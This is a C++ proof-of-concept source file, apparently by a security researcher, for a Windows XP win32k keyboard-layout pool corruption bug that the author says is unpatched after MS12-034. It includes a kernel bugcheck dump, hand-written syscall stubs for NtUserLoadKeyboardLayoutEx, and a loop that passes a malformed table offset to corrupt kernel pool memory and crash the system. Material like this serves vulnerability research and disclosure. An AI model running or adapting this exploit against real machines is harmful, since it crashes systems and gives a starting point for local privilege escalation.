#include "stdafx.h"

/*
    Windows XP keyboard layouts pool corruption 0day PoC, post-MS12-034.

    Vulnerability exists in the function win32k!ReadLayoutFile(), that parses
    keyboard layout files data. Possible attack vector -- local privileges 
    escalation.

    Similar vuln (CVE-2012-0183) was patched recently, but I wonder, that
    Microsoft missed to rewrite vulnerable code on Windows XP, and this PoC
    still able to crash fully-patched XP SP3.
    
    However, pool corruption is not fully-controllable, and reliable code execution
    exploit development is quite a difficult task.

    --------------------------------

    By Oleksiuk Dmytro (aka Cr4sh)
    
    http://twitter.com/d_olex
    http://blog.cr4.sh
    mailto:dmitry@esagelab.com

    --------------------------------

    Typical bugcheck:


    *******************************************************************************
    *                                                                             *
    *                        Bugcheck Analysis                                    *
    *                                                                             *
    *******************************************************************************

    PAGE_FAULT_IN_NONPAGED_AREA (50)
    Invalid system memory was referenced.  This cannot be protected by try-except,
    it must be protected by a Probe.  Typically the address is just plain bad or it
    is pointing at freed memory.
    Arguments:
    Arg1: e10650d3, memory referenced.
    Arg2: 00000000, value 0 = read operation, 1 = write operation.
    Arg3: bf881fb6, If non-zero, the instruction address which referenced the bad memory
    address.
    Arg4: 00000001, (reserved)

    Debugging Details:
    ------------------


    READ_ADDRESS:  e10650d3 Paged pool

    FAULTING_IP: 
    win32k!ReadLayoutFile+183
    bf881fb6 803800          cmp     byte ptr [eax],0

    MM_INTERNAL_CODE:  1

    IMAGE_NAME:  win32k.sys

    DEBUG_FLR_IMAGE_TIMESTAMP:  4f85831a

    MODULE_NAME: win32k

    FAULTING_MODULE: bf800000 win32k

    DEFAULT_BUCKET_ID:  DRIVER_FAULT

    BUGCHECK_STR:  0x50

    PROCESS_NAME:  win32k_Keyboard

    TRAP_FRAME:  b191c884 -- (.trap 0xffffffffb191c884)
    ErrCode = 00000000
    eax=e10650d3 ebx=e105b008 ecx=e105b008 edx=00000000 esi=e106ac08 edi=e105c008
    eip=bf881fb6 esp=b191c8f8 ebp=b191c90c iopl=0         nv up ei ng nz na po nc
    cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010282
    win32k!ReadLayoutFile+0x183:
    bf881fb6 803800          cmp     byte ptr [eax],0           ds:0023:e10650d3=??
    Resetting default scope

    LAST_CONTROL_TRANSFER:  from 804f7b8b to 80527c24

    STACK_TEXT:  
    b191c3c0 804f7b8b 00000003 e10650d3 00000000 nt!RtlpBreakWithStatusInstruction
    b191c40c 804f8778 00000003 00000000 c0708328 nt!KiBugCheckDebugBreak+0x19
    b191c7ec 804f8ca3 00000050 e10650d3 00000000 nt!KeBugCheck2+0x574
    b191c80c 8051cc4f 00000050 e10650d3 00000000 nt!KeBugCheckEx+0x1b
    b191c86c 805405f4 00000000 e10650d3 00000000 nt!MmAccessFault+0x8e7
    b191c86c bf881fb6 00000000 e10650d3 00000000 nt!KiTrap0E+0xcc
    b191c90c bf881e25 e208f8e8 e10611c8 e105c008 win32k!ReadLayoutFile+0x183
    b191c92c bf8b9574 800003a4 00000000 00000000 win32k!LoadKeyboardLayoutFile+0x6a
    b191c9b4 bf92a002 82273e08 800003a4 04090409 win32k!xxxLoadKeyboardLayoutEx+0x1b1
    b191c9f0 bf8b91b5 82273e08 0000003c 04090409 win32k!xxxSafeLoadKeyboardLayoutEx+0xa9
    b191cd40 8053d6f8 0000003c 00000000 0012fec8 win32k!NtUserLoadKeyboardLayoutEx+0x164
    b191cd40 004011c4 0000003c 00000000 0012fec8 nt!KiFastCallEntry+0xf8
    0012ff7c 004015de 00000001 00363c48 00362e80 win32k_KeyboardLayout_expl!NtUserLoadKeyboardLayoutEx+0x14 [x:\dev\_exploits\_local\win32k_keyboardlayout_expl\win32k_keyboardlayout_expl\win32k_keyboardlayout_expl.cpp @ 37]
    0012ffc0 7c817077 00330036 00360038 7ffdd000 win32k_KeyboardLayout_expl!__tmainCRTStartup+0x10f [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 586]
    0012fff0 00000000 00401726 00000000 78746341 kernel32!BaseProcessStart+0x23


    STACK_COMMAND:  kb

    FOLLOWUP_IP: 
    win32k!ReadLayoutFile+183
    bf881fb6 803800          cmp     byte ptr [eax],0

    SYMBOL_STACK_INDEX:  6

    SYMBOL_NAME:  win32k!ReadLayoutFile+183

    FOLLOWUP_NAME:  MachineOwner

    FAILURE_BUCKET_ID:  0x50_win32k!ReadLayoutFile+183

    BUCKET_ID:  0x50_win32k!ReadLayoutFile+183

    Followup: MachineOwner
    ---------
*/

#define KBD_FILE "C:\\Windows\\system32\\KBDUS.DLL"

#define OFF_TABLE_VAL 0

DWORD m_SDT_NtUserLoadKeyboardLayoutEx = 0x11c6;
DWORD m_SDT_NtUserUnloadKeyboardLayoutEx = 0x123c;
//--------------------------------------------------------------------------------------
__declspec(naked) HKL WINAPI NtUserLoadKeyboardLayoutEx(
    HANDLE Handle,
    DWORD offTable,
    PUNICODE_STRING puszKeyboardName,
    HKL hKL,
    PUNICODE_STRING puszKLID,
    DWORD dwKLID,
    UINT Flags)
{
    __asm
    {
        cmp     m_SDT_NtUserLoadKeyboardLayoutEx, 0
        jz      _failed
        mov     eax, m_SDT_NtUserLoadKeyboardLayoutEx
        lea     edx, [esp + 4]
        int     0x2e
        retn    0x1c
   
_failed:
        mov     eax, 0xc00000001
        retn    0x1c
    }
}
//--------------------------------------------------------------------------------------
__declspec(naked) BOOL WINAPI NtUserUnloadKeyboardLayoutEx(HKL hKL)
{
    __asm
    {
        cmp     m_SDT_NtUserUnloadKeyboardLayoutEx, 0
        jz      _failed
        mov     eax, m_SDT_NtUserUnloadKeyboardLayoutEx
        lea     edx, [esp + 4]
        int     0x2e
        retn    0x04

_failed:
        mov     eax, 0xc00000001
        retn    0x04
    }
}
//--------------------------------------------------------------------------------------
int _tmain(int argc, _TCHAR* argv[])
{    
    OSVERSIONINFOEX osvi;
    ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX));
    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);

    if (!GetVersionEx((OSVERSIONINFO *)&osvi))
    {
        osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);

        if (!GetVersionEx((OSVERSIONINFO *)&osvi)) 
        {
            DbgMsg(__FILE__, __LINE__, "GetVersionEx() ERROR %d\n", GetLastError());
            return -1;
        }
    }

    // check for the windows XP
    if (osvi.dwPlatformId != VER_PLATFORM_WIN32_NT || osvi.dwBuildNumber != 2600)
    {
        MessageBoxA(
            0, 
            "ERROR: This PoC is designed to run on windows XP only.", 
            __FUNCTION__, MB_ICONERROR
        );

        goto end;
    } 

    HANDLE hFile = CreateFile(KBD_FILE, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if (hFile != INVALID_HANDLE_VALUE)
    {                
        for (DWORD i = 0; i < 20; i++)
        {
            DWORD dwId = 0x00001000 + i, dwProcessId = 0;
            WCHAR Id[20];                    

            UNICODE_STRING usLayoutName, usLayoutId;    
            usLayoutName.Buffer = NULL;
            usLayoutName.Length = usLayoutName.MaximumLength = 0;

            wsprintfW(Id, L"%.8x", dwId);
            usLayoutId.Buffer = Id;
            usLayoutId.Length = usLayoutId.MaximumLength = wcslen(usLayoutId.Buffer) * sizeof(WCHAR);

            HKL hKl = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(), &dwProcessId));

            /* 
                NOTES: 
                
                ======================================================================

                offTable argument of win32k!NtUserLoadKeyboardLayoutEx()
                means (Section RVA + Offset of _KBDTABLES inside the .data section).

                Original win32k!ReadLayoutFile() code from Windows 2000, that
                relevant to WIndows XP:

                    pBaseDst = UserAllocPool(dwDataSize, TAG_KBDTABLE);
                    if (pBaseDst != NULL) 
                    {
                        VK_TO_WCHAR_TABLE *pVkToWcharTable;
                        VSC_LPWSTR *pKeyName;
                        LPWSTR *lpDeadKey;

                        pkf->hBase = (HANDLE)pBaseDst;
                        RtlMoveMemory(pBaseDst, (PBYTE)DosHdr +
                                SectionTableEntry->PointerToRawData, dwDataSize);

                        if (ISTS()) {
                            pkf->Size = dwDataSize; // For shadow hotkey processing
                        }

                        // Compute table address and fixup pointers in table.
                        pktNew = (PKBDTABLES)(pBaseDst + offTable);

                        // The address in the data section has the virtual address
                        // added in, so we need to adjust the fixup pointer to
                        // compensate.
                        pBaseVirt = pBaseDst - SectionTableEntry->VirtualAddress;

                        FIXUP_PTR(pktNew->pCharModifiers, pBaseVirt);
                        FIXUP_PTR(pktNew->pCharModifiers->pVkToBit, pBaseVirt);

                        if (FIXUP_PTR(pktNew->pVkToWcharTable, pBaseVirt)) 
                        {
                            for (pVkToWcharTable = pktNew->pVkToWcharTable;
                                 pVkToWcharTable->pVkToWchars != NULL; pVkToWcharTable++)
                                 FIXUP_PTR(pVkToWcharTable->pVkToWchars, pBaseVirt);
                        }

                        FIXUP_PTR(pktNew->pDeadKey, pBaseVirt);

                        // Version 1 layouts support ligatures.
                        if (GET_KBD_VERSION(pktNew)) 
                        {
                            FIXUP_PTR(pktNew->pLigature, pBaseVirt);
                        }

                        if (FIXUP_PTR(pktNew->pKeyNames, pBaseVirt)) 
                        {
                            for (pKeyName = pktNew->pKeyNames; pKeyName->vsc != 0; pKeyName++)
                                 FIXUP_PTR(pKeyName->pwsz, pBaseVirt);
                        }

                        if (FIXUP_PTR(pktNew->pKeyNamesExt, pBaseVirt)) 
                        {
                            for (pKeyName = pktNew->pKeyNamesExt; pKeyName->vsc != 0; pKeyName++)
                                 FIXUP_PTR(pKeyName->pwsz, pBaseVirt);
                        }

                        if (FIXUP_PTR(pktNew->pKeyNamesDead, pBaseVirt)) 
                        {
                            for (lpDeadKey = pktNew->pKeyNamesDead; *lpDeadKey != NULL;
                                 lpDeadKey++)
                                 FIXUP_PTR(*lpDeadKey, pBaseVirt);
                        }

                        FIXUP_PTR(pktNew->pusVSCtoVK, pBaseVirt);
                        FIXUP_PTR(pktNew->pVSCtoVK_E0, pBaseVirt);
                        FIXUP_PTR(pktNew->pVSCtoVK_E1, pBaseVirt);

                        if (offNlsTable) 
                        {
                            // Compute table address and fixup pointers in table.
                            offNlsTable -= SectionTableEntry->VirtualAddress;
                            pknlstNew = (PKBDNLSTABLES)(pBaseDst + offNlsTable);

                            // Fixup the address.
                            FIXUP_PTR(pknlstNew->pVkToF, pBaseVirt);
                            FIXUP_PTR(pknlstNew->pusMouseVKey, pBaseVirt);

                            // Save the pointer.
                            *ppNlsTables = pknlstNew;

                            // ...
                        }
                    }
                
                    // ...

                ======================================================================                        

                When offTable is bigger than 0xffff -- value, that passed to the 
                win32k!ReadLayoutFile() is zero, so:

                win32k!ReadLayoutFile+0x6f (*):
                mov     esi,dword ptr [ebp+10h] ; zero
                sub     esi,dword ptr [eax+0Ch] ; Section RVA, 0x1000
                
                ... gives 0xfffff000 as ESI value, that uses as offset to the 
                _KBDTABLES structure in the ".data" section of keyboard layout file.
                After all, pool corruption occurs when the win32k!ReadLayoutFile() trying
                to relocate ponters at incorrect offsets with the FIXUP_PTR() macro.

                ----
                (*) win32k.sys version is 5.1.2600.6206
            */

            HKL hNew = NtUserLoadKeyboardLayoutEx(hFile, OFF_TABLE_VAL, &usLayoutName, hKl, &usLayoutId, dwId, 0x101);
            if (hNew)
            {
                DbgMsg(__FILE__, __LINE__, "NtUserLoadKeyboardLayoutEx() returns 0x%.8x\n", hNew);
                NtUserUnloadKeyboardLayoutEx(hNew);
            }                
            else
            {
                DbgMsg(__FILE__, __LINE__, "NtUserLoadKeyboardLayoutEx() fails\n");
            }
        }                                

        CloseHandle(hFile);
    }

end:
    printf("Press any key to quit...\n");
    _getch();

    return 0;
}
//--------------------------------------------------------------------------------------
// EoF
